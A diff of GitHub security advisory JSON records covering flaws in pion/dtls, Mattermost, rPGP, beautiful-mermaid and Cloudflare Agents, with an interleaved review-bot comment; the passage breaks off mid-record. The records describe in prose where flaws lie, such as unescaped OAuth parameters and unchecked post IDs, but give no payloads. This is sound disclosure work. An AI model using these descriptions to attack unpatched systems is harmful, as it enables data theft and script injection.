+++ b/advisories/github-reviewed/2026/02/GHSA-9f3f-wv7r-qc8r/GHSA-9f3f-wv7r-qc8r.json
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-9f3f-wv7r-qc8r",
- "modified": "2026-02-12T22:07:22Z",
+ "modified": "2026-02-13T14:18:28Z",
"published": "2026-02-11T15:13:12Z",
"aliases": [
"CVE-2026-26014"
@@ -25,13 +25,16 @@
"type": "ECOSYSTEM",
"events": [
{
- "introduced": "0"
+ "introduced": "3.1.0"
},
{
- "fixed": "3.1.0"
+ "fixed": "3.1.1"
}
]
}
+ ],
+ "versions": [
+ "3.1.0"
]
},
{
@@ -71,6 +74,25 @@
]
}
]
+ },
+ {
+ "package": {
+ "ecosystem": "Go",
+ "name": "github.com/pion/dtls/v3"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "3.0.11"
+ }
+ ]
+ }
+ ]
}
],
"references": [
@@ -90,13 +112,21 @@
"type": "WEB",
"url": "https://github.com/pion/dtls/commit/61762dee8217991882c5eb79856b9e7a73ee349f"
},
+ {
+ "type": "WEB",
+ "url": "https://github.com/pion/dtls/commit/90e241cfec2985715efdd3d005972847462a67d6"
+ },
{
"type": "PACKAGE",
"url": "https://github.com/pion/dtls"
},
{
"type": "WEB",
- "url": "https://github.com/pion/dtls/releases/tag/v3.1.0"
+ "url": "https://github.com/pion/dtls/releases/tag/v3.0.11"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/pion/dtls/releases/tag/v3.1.1"
}
],
"database_specific": {
diff --git a/advisories/github-reviewed/2026/02/GHSA-9pj7-jh2r-87g8/GHSA-9pj7-jh2r-87g8.json b/advisories/github-reviewed/2026/02/GHSA-9pj7-jh2r-87g8/GHSA-9pj7-jh2r-87g8.json
new file mode 100644
index 0000000000000..43f98ba4f0d5e
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-9pj7-jh2r-87g8/GHSA-9pj7-jh2r-87g8.json
@@ -0,0 +1,108 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9pj7-jh2r-87g8",
+ "modified": "2026-02-13T20:56:15Z",
+ "published": "2026-02-13T12:31:21Z",
+ "aliases": [
+ "CVE-2026-22892"
+ ],
+ "summary": "Mattermost doesn't validate user permissions when creating Jira issues from Mattermost posts",
+ "details": "Mattermost versions 11.1.x <= 11.1.2, 10.11.x <= 10.11.9, 11.2.x <= 11.2.1 fail to validate user permissions when creating Jira issues from Mattermost posts, which allows an authenticated attacker with access to the Jira plugin to read post content and attachments from channels they do not have access to via the /create-issue API endpoint by providing the post ID of an inaccessible post.. Mattermost Advisory ID: MMSA-2025-00550",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Go",
+ "name": "github.com/mattermost/mattermost-server"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "11.2.0"
+ },
+ {
+ "fixed": "11.2.2"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 11.2.1"
+ }
+ },
+ {
+ "package": {
+ "ecosystem": "Go",
+ "name": "github.com/mattermost/mattermost-server"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "11.1.0"
+ },
+ {
+ "fixed": "11.1.3"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 11.1.2"
+ }
+ },
+ {
+ "package": {
+ "ecosystem": "Go",
+ "name": "github.com/mattermost/mattermost-server"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "10.11.0"
+ },
+ {
+ "fixed": "10.11.10"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 10.11.9"
+ }
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22892"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/mattermost/mattermost"
+ },
+ {
+ "type": "WEB",
+ "url": "https://mattermost.com/security-updates"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-863"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-13T20:56:15Z",
+ "nvd_published_at": "2026-02-13T11:16:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/02/GHSA-c7ph-f7jm-xv4w/GHSA-c7ph-f7jm-xv4w.json b/advisories/github-reviewed/2026/02/GHSA-c7ph-f7jm-xv4w/GHSA-c7ph-f7jm-xv4w.json
new file mode 100644
index 0000000000000..03870e3d5e003
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-c7ph-f7jm-xv4w/GHSA-c7ph-f7jm-xv4w.json
@@ -0,0 +1,55 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-c7ph-f7jm-xv4w",
+ "modified": "2026-02-13T20:55:20Z",
+ "published": "2026-02-13T20:55:20Z",
+ "aliases": [],
+ "summary": "rPGP's integrity protection of encrypted data was not always checked",
+ "details": "### Summary\nFor some messages, rPGP returned incorrectly decrypted data without signaling that integrity protection was invalid.\n\n### Details\nWhen decrypting SEIPD (Symmetrically Encrypted and Integrity Protected Data Packet), rPGP previously did not under all circumstances report the absence of valid integrity protection to callers of the library.\n\n### Impact\nWhile the resulting invalid decryption output is not attacker controlled, its contents may be a security concern if an attacker can gain access to it.\n\n### Attribution\nDiscovered internally in the course of rPGP development work.",
+ "severity": [
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "crates.io",
+ "name": "pgp"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0.16.0-alpha.0"
+ },
+ {
+ "fixed": "0.19.0"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/rpgp/rpgp/security/advisories/GHSA-c7ph-f7jm-xv4w"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/rpgp/rpgp"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-354"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-13T20:55:20Z",
+ "nvd_published_at": null
+ }
+}
\ No newline at end of file
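Review bot: Unlike the sibling rPGP advisory added in this commit (GHSA-8h58-w33p-wq3g), this record lists no fix PR or commit under `references`, only the advisory URL and the repository, so consumers cannot locate the change that made SEIPD integrity failures surface to callers; if the fix is identifiable, a `{"type": "WEB", "url": "<FIX_COMMIT_OR_PR_URL>"}` entry should be added. The `AT:P` and `VC:L/VI:L` components of the CVSS_V4 vector are plausible for returning unverified plaintext, but the details' phrase "did not under all circumstances report" leaves open which decryption path was affected, and naming it (or stating that the callers' integrity-check API was the gap) would let integrators judge whether their usage is exposed.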
diff --git a/advisories/github-reviewed/2026/02/GHSA-cgmm-x5ww-q5cr/GHSA-cgmm-x5ww-q5cr.json b/advisories/github-reviewed/2026/02/GHSA-cgmm-x5ww-q5cr/GHSA-cgmm-x5ww-q5cr.json
new file mode 100644
index 0000000000000..c260b4d1b9cbb
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-cgmm-x5ww-q5cr/GHSA-cgmm-x5ww-q5cr.json
@@ -0,0 +1,77 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-cgmm-x5ww-q5cr",
+ "modified": "2026-02-13T21:04:19Z",
+ "published": "2026-02-13T18:31:25Z",
+ "aliases": [
+ "CVE-2026-26226"
+ ],
+ "summary": "beautiful-mermaid contains an SVG attribute injection issue that can lead to cross-site scripting (XSS)",
+ "details": "beautiful-mermaid versions prior to 0.1.3 contain an SVG attribute injection issue that can lead to cross-site scripting (XSS) when rendering attacker-controlled Mermaid diagrams. User-controlled values from Mermaid style and classDef directives are interpolated into SVG attribute values without proper escaping, allowing crafted input to break out of an attribute context and inject arbitrary SVG elements/attributes into the rendered output. When the generated SVG is embedded in a web page, this can result in script execution in the context of the embedding origin.",
+ "severity": [
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "npm",
+ "name": "beautiful-mermaid"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "0.1.3"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26226"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/lukilabs/beautiful-mermaid/pull/8"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/lukilabs/beautiful-mermaid/commit/68f3ab8c9658e7f4a3b749e06a6b96e4c3f55db1"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/lukilabs/beautiful-mermaid"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/lukilabs/beautiful-mermaid/releases/tag/v0.1.3"
+ },
+ {
+ "type": "WEB",
+ "url": "https://neo.projectdiscovery.io/share/cec71dc7-a8eb-417e-b8b4-666644796c1e"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.vulncheck.com/advisories/beautiful-mermaid-svg-attribute-injection"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-13T21:04:19Z",
+ "nvd_published_at": "2026-02-13T17:16:14Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/02/GHSA-cvhv-6xm6-c3v4/GHSA-cvhv-6xm6-c3v4.json b/advisories/github-reviewed/2026/02/GHSA-cvhv-6xm6-c3v4/GHSA-cvhv-6xm6-c3v4.json
new file mode 100644
index 0000000000000..3cc25c3b3a55b
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-cvhv-6xm6-c3v4/GHSA-cvhv-6xm6-c3v4.json
@@ -0,0 +1,65 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-cvhv-6xm6-c3v4",
+ "modified": "2026-02-13T20:04:56Z",
+ "published": "2026-02-13T03:31:23Z",
+ "aliases": [
+ "CVE-2026-1721"
+ ],
+ "summary": "Cloudflare Agents is Vulnerable to Reflected Cross-Site Scripting in the AI Playground's OAuth callback handler",
+ "details": "Summary\n\nA Reflected Cross-Site Scripting (XSS) vulnerability was discovered in the AI Playground's OAuth callback handler. The `error_description` query parameter was directly interpolated into an HTML script tag without proper escaping, allowing attackers to execute arbitrary JavaScript in the context of the victim's session.\n\nRoot cause\n\nThe OAuth callback handler in `site/ai-playground/src/server.ts` directly interpolated the `authError` value, sourced from the `error_description` query parameter, into an inline `